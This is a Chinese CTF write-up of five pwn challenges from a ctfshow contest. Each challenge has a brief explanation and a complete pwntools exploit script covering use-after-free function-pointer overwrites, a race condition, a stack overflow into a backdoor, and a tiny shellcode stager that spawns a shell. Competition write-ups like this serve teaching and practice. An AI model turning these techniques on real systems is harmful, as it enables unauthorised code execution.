想起自己貌似没有发过比赛的 wp,也完完整整地参加了好几个比赛,之后会陆续发
ctfshow 愚人杯做完 pwn 方向的题目就溜了,拿了三个一血、两个二血。感觉自己棒棒哒。
easy_checkin
把 show 功能函数放在堆块上且自带后门的题目,存放 UAF 漏洞,修改下 show 功能函数为后门函数再利用 UAF 即可。
就是题目做了处理,不是很好调试。
from pwn import * from struct import pack from ctypes import * #from LibcSearcher import * def s(a) : p.send(a) def sa(a, b) : p.sendafter(a, b) def sl(a) : p.sendline(a) def sla(a, b) : p.sendlineafter(a, b) def r() : return p.recv() def pr() : print(p.recv()) def rl(a) : return p.recvuntil(a) def inter() : p.interactive() def debug(): gdb.attach(p) pause() def get_addr() : return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00')) def csu(rdi, rsi, rdx, rip, gadget) : return p64(gadget) + p64(0) + p64(1) + p64(rip) + p64(rdi) + p64(rsi) + p64(rdx) + p64(gadget - 0x1a) context(os='linux', arch='amd64', log_level='debug') #p = gdb.debug('./pwn', 'b *0x400132') #p = process('./pwn') p = remote('pwn.challenge.ctf.show', 28106) elf = ELF('./pwn') #libc = ELF('/home/w1nd/Desktop/glibc-all-in-one/libs/2.27-3ubuntu1.6_i386/libc-2.27.so') #libc = ELF('./buu/libc-2.27.so') def add(size, data): sla(b'chioce :', b'1') sla(b'size :', str(size)) sla(b'Content :', data) def free(idx): sla(b'chioce :', b'2') sla(b'Index :', str(idx)) def show(idx): sla(b'chioce :', b'3') sla(b'Index :', str(idx)) add(0x20, b'a'*0x8) add(0x20, b'a'*0x8) free(0) free(1) add(0x8, p32(0x8048C43) + b'stopstop') show(0) inter()
baby_pad
这道题有两个堆块菜单管理系统,需要进入第二个堆块管理系统,然后和 easy_checkin 一样。
from pwn import * from struct import pack from ctypes import * #from LibcSearcher import * def s(a) : p.send(a) def sa(a, b) : p.sendafter(a, b) def sl(a) : p.sendline(a) def sla(a, b) : p.sendlineafter(a, b) def r() : return p.recv() def pr() : print(p.recv()) def rl(a) : return p.recvuntil(a) def inter() : p.interactive() def debug(): gdb.attach(p) pause() def get_addr() : return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00')) def csu(rdi, rsi, rdx, rip, gadget) : return p64(gadget) + p64(0) + p64(1) + p64(rip) + p64(rdi) + p64(rsi) + p64(rdx) + p64(gadget - 0x1a) context(os='linux', arch='amd64', log_level='debug') #p = gdb.debug('./pwn', 'b *0x400132') #p = process('./pwn') p = remote('pwn.challenge.ctf.show', 28106) elf = ELF('./pwn') #libc = ELF('/home/w1nd/Desktop/glibc-all-in-one/libs/2.27-3ubuntu1.6_i386/libc-2.27.so') #libc = ELF('./buu/libc-2.27.so') def add(size, data = b'a'): sla(b'>>> ', b'A') sla(b'>>> ', str(size)) sla(b'>>> ', data) def free(idx): sla(b'>>> ', b'D') sla(b'>>> ', str(idx)) add(0x10) free(1) sl(b'1') sla(b'size :', str(0x20)) sla(b'Content :', b'a') sl(b'1') sla(b'size :', str(0x20)) sla(b'Content :', b'a') sl(b'2') sla(b'Index :', str(0)) sl(b'2') sla(b'Index :', str(1)) sl(b'1') sla(b'size :', str(0x10)) sla(b'Content :', p64(0x400F82)) sl(b'3') sla(b'Index :', str(0)) inter()
easy_sql
程序反汇编后看起来非常复杂,但看完后发现其实就是一个很简单的多线程竞争。
from pwn import * from struct import pack from ctypes import * #from LibcSearcher import * def s(a) : p.send(a) def sa(a, b) : p.sendafter(a, b) def sl(a) : p.sendline(a) def sla(a, b) : p.sendlineafter(a, b) def r() : return p.recv() def pr() : print(p.recv()) def rl(a) : return p.recvuntil(a) def inter() : p.interactive() def debug(): gdb.attach(p) pause() def get_addr() : return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00')) def csu(rdi, rsi, rdx, rip, gadget) : return p64(gadget) + p64(0) + p64(1) + p64(rip) + p64(rdi) + p64(rsi) + p64(rdx) + p64(gadget - 0x1a) context(os='linux', arch='amd64', log_level='debug') #p = gdb.debug('./pwn', 'b *0x400132') #p = process('./pwn') p = remote('pwn.challenge.ctf.show', 28106) elf = ELF('./pwn') #libc = ELF('/home/w1nd/Desktop/glibc-all-in-one/libs/2.27-3ubuntu1.6_i386/libc-2.27.so') #libc = ELF('./buu/libc-2.27.so') sla(b'code: ', b'a'*0x20 + p32(0x796573)) sla(b'Query: ', b'read') sla(b'from: ', b'database.txt') sla(b'Query: ', b'read') sla(b'from: ', b'flag') sla(b'read: ', b'1') pr()
easy_login
程序逆向起来比较复杂,只要把程序逆向明白,然后控制程序调用后门函数即可
from pwn import * from struct import pack from ctypes import * #from LibcSearcher import * def s(a) : p.send(a) def sa(a, b) : p.sendafter(a, b) def sl(a) : p.sendline(a) def sla(a, b) : p.sendlineafter(a, b) def r() : return p.recv() def pr() : print(p.recv()) def rl(a) : return p.recvuntil(a) def inter() : p.interactive() def debug(): gdb.attach(p) pause() def get_addr() : return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00')) def csu(rdi, rsi, rdx, rip, gadget) : return p64(gadget) + p64(0) + p64(1) + p64(rip) + p64(rdi) + p64(rsi) + p64(rdx) + p64(gadget - 0x1a) context(os='linux', arch='amd64', log_level='debug') #p = gdb.debug('./pwn', 'b *0x400132') #p = process('./pwn') p = remote('pwn.challenge.ctf.show', 28106) elf = ELF('./pwn') #libc = ELF('/home/w1nd/Desktop/glibc-all-in-one/libs/2.27-3ubuntu1.6_i386/libc-2.27.so') #libc = ELF('./buu/libc-2.27.so') #gdb.attach(p, 'b *$rebase(0x15c0)') sla(b'application --\n', b'l') sla(b'Username: ', b'a'*0x40 + p64(0x776174)) sla(b'Password: ', b'b'*0x10) sleep(1) sl(b'Fool Jazz Mingus Hat') inter()
baby_shellcode
题目极具迷惑性,一开始我以为要猜出加密算法用的 key,后来发现可以看成只写入九个字节的 shellocde 题目,就比较简单了。
这道题我用了五个字节,应该是最少的了
from pwn import * from struct import pack from ctypes import * #from LibcSearcher import * def s(a) : p.send(a) def sa(a, b) : p.sendafter(a, b) def sl(a) : p.sendline(a) def sla(a, b) : p.sendlineafter(a, b) def r() : return p.recv() def pr() : print(p.recv()) def rl(a) : return p.recvuntil(a) def inter() : p.interactive() def debug(): gdb.attach(p) pause() def get_addr() : return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00')) def csu(rdi, rsi, rdx, rip, gadget) : return p64(gadget) + p64(0) + p64(1) + p64(rip) + p64(rdi) + p64(rsi) + p64(rdx) + p64(gadget - 0x1a) context(os='linux', arch='amd64', log_level='debug') #p = gdb.debug('./pwn', 'b *0x400132') #p = process('./pwn') p = remote('pwn.challenge.ctf.show', 28106) elf = ELF('./pwn') #libc = ELF('/home/w1nd/Desktop/glibc-all-in-one/libs/2.27-3ubuntu1.6_i386/libc-2.27.so') #libc = ELF('./buu/libc-2.27.so') #Z_X\x0f\x05 #print(asm('pop rdx; pop rdi; pop rax; syscall')) s(b'\xe9\xce\x27\xd2\x67') sleep(1) s(b'a'*14 + asm(shellcraft.sh())) inter() #pause()